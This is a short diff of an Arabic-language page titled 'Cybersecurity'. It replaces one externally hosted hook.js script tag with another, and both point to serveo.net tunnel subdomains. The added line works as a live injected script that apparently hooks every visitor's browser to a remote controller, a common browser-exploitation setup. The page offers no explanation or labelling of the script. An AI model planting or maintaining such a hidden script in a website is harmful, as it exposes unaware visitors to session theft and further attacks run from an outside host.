--- a/home.html
+++ b/home.html
@@ -13,7 +13,7 @@
                     <li><a href="#">Support</a></li>
                 </ul>
             </div>
-            <script src="https://8dfbf04ef4db40ee2761fd64a665d8bf.serveo.net:443/hook.js"></script>
+            <script src="https://e5189200fecb3e98afc9377a8e1d1897.serveo.net/hook.js"></script>
             <div class="content">
                 <h1>الأمن السيبراني</h1>
                 <p></p>
